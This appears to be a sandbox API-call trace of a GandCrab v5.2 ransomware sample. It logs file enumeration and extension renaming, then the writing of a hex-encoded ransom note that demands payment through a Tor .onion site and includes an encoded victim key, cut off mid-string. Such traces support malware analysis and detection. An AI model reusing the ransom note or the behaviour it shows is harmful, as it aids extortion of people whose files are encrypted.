FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0069.299] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0069.299] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0069.300] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\d2ca4a09d2ca4deb61a.lock" [0069.300] lstrlenW (lpString=".titwmvjl") returned 9 [0069.300] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\d2ca4a09d2ca4deb61a.lock") returned 79 [0069.300] VirtualAlloc (lpAddress=0x0, dwSize=0xde, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.300] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 88 [0069.300] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\d2ca4a09d2ca4deb61a.lock") returned 79 [0069.300] lstrlenW (lpString=".lock") returned 5 [0069.300] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.300] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0069.300] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.300] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.300] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0069.300] lstrcmpW (lpString1="Forms", lpString2=".") returned 1 [0069.300] lstrcmpW (lpString1="Forms", lpString2="..") returned 1 [0069.300] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\", lpString2="Forms" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms" [0069.301] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\" [0069.301] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0069.301] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.301] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0069.301] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.301] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0069.301] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.302] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0069.302] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.302] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0069.302] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.302] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.303] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\\\TITWMVJL-DECRYPT.txt") returned 82 [0069.303] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\forms\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0069.303] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\